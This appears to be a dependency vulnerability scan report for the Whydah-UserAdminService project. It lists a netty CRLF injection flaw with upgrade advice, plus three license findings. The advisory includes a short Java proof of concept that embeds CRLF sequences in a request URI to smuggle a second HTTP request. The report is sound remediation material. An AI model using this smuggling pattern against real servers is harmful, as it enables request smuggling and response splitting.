Vulnerabilities	1 via 6 paths
Dependencies	131
Source	GitHub
Commit	e95f7c37

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications

Issue type

Vulnerabilities
1
License issues
3

Severity

Critical
High
Medium
4
Low

Status

Open
4
Patched
0
Ignored
0

medium severity

CRLF Injection

Vulnerable module: io.netty:netty-codec-http
Introduced through: com.azure:azure-identity@1.18.1

Detailed paths

Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#e95f7c37eec35627e2d7157fc7e1f2a14d781dab › com.azure:azure-identity@1.18.1 › com.azure:azure-core-http-netty@1.16.2 › io.netty:netty-codec-http@4.1.127.Final

Remediation: Upgrade to com.azure:azure-identity@1.18.2.
Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#e95f7c37eec35627e2d7157fc7e1f2a14d781dab › com.azure:azure-identity@1.18.1 › com.azure:azure-core-http-netty@1.16.2 › io.netty:netty-codec-http2@4.1.127.Final › io.netty:netty-codec-http@4.1.127.Final

Remediation: Upgrade to com.azure:azure-identity@1.18.2.
Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#e95f7c37eec35627e2d7157fc7e1f2a14d781dab › com.azure:azure-identity@1.18.1 › com.azure:azure-core-http-netty@1.16.2 › io.netty:netty-handler-proxy@4.1.127.Final › io.netty:netty-codec-http@4.1.127.Final

Remediation: Upgrade to com.azure:azure-identity@1.18.2.
Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#e95f7c37eec35627e2d7157fc7e1f2a14d781dab › com.azure:azure-identity@1.18.1 › com.azure:azure-core-http-netty@1.16.2 › io.projectreactor.netty:reactor-netty-http@1.2.10 › io.netty:netty-codec-http@4.1.127.Final
Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#e95f7c37eec35627e2d7157fc7e1f2a14d781dab › com.azure:azure-identity@1.18.1 › com.azure:azure-core-http-netty@1.16.2 › io.projectreactor.netty:reactor-netty-http@1.2.10 › io.netty:netty-codec-http2@4.1.127.Final › io.netty:netty-codec-http@4.1.127.Final
Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#e95f7c37eec35627e2d7157fc7e1f2a14d781dab › com.azure:azure-identity@1.18.1 › com.azure:azure-core-http-netty@1.16.2 › io.projectreactor.netty:reactor-netty-http@1.2.10 › io.projectreactor.netty:reactor-netty-core@1.2.10 › io.netty:netty-handler-proxy@4.1.127.Final › io.netty:netty-codec-http@4.1.127.Final

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to CRLF Injection in HttpRequestEncoder, due to improper sanitization of a URI with line-breaks in the DefaultHttpRequest class. An attacker can manipulate HTTP requests to cause parser desynchronization, request smuggling, and response splitting by including line break characters in requests.

PoC


public static void main(String[] args) {

  EmbeddedChannel client = new EmbeddedChannel();
  client.pipeline().addLast(new HttpClientCodec());

  EmbeddedChannel server = new EmbeddedChannel();
  server.pipeline().addLast(new HttpServerCodec());
  server.pipeline().addLast(new ChannelInboundHandlerAdapter() {
    @Override
    public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
      System.out.println("Processing msg " + msg);
    }
  });

  DefaultHttpRequest request = new DefaultHttpRequest(
    HttpVersion.HTTP_1_1,
    HttpMethod.GET,
    "/s1 HTTP/1.1\r\n" +
      "\r\n" +
      "POST /s2 HTTP/1.1\r\n" +
      "content-length: 11\r\n\r\n" +
      "Hello World" +
      "GET /s1"
  );
  client.writeAndFlush(request);
  ByteBuf tmp;
  while ((tmp = client.readOutbound()) != null) {
    server.writeInbound(tmp);
  }
}

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.129.Final, 4.2.8.Final or higher.

References

GitHub Commit

CRLF Injection vulnerability report

medium severity

Dual license: EPL-1.0, LGPL-2.1

Module: ch.qos.logback:logback-classic
Introduced through: ch.qos.logback:logback-classic@1.5.21

Detailed paths

Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#e95f7c37eec35627e2d7157fc7e1f2a14d781dab › ch.qos.logback:logback-classic@1.5.21

Dual license: EPL-1.0, LGPL-2.1

Dual license: EPL-1.0, LGPL-2.1 vulnerability report

medium severity

Dual license: EPL-1.0, LGPL-2.1

Module: ch.qos.logback:logback-core
Introduced through: ch.qos.logback:logback-classic@1.5.21

Detailed paths

Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#e95f7c37eec35627e2d7157fc7e1f2a14d781dab › ch.qos.logback:logback-classic@1.5.21 › ch.qos.logback:logback-core@1.5.21

Dual license: EPL-1.0, LGPL-2.1

Dual license: EPL-1.0, LGPL-2.1 vulnerability report

medium severity

LGPL-3.0 license

Module: org.jboss.logging:jboss-logging-processor
Introduced through: org.jboss.weld.se:weld-se-core@5.1.5.Final

Detailed paths

Introduced through: Cantara/Whydah-UserAdminService@Cantara/Whydah-UserAdminService#e95f7c37eec35627e2d7157fc7e1f2a14d781dab › org.jboss.weld.se:weld-se-core@5.1.5.Final › org.jboss.weld:weld-lite-extension-translator@5.1.5.Final › org.jboss.logging:jboss-logging-processor@2.2.1.Final

LGPL-3.0 license

LGPL-3.0 license vulnerability report

Vulnerabilities

Dependencies

Source

Commit

Find, fix and prevent vulnerabilities in your code.

medium severity

CRLF Injection

Detailed paths

Overview

PoC

Remediation

References

medium severity

Dual license: EPL-1.0, LGPL-2.1

Detailed paths

medium severity

Dual license: EPL-1.0, LGPL-2.1

Detailed paths

medium severity

LGPL-3.0 license

Detailed paths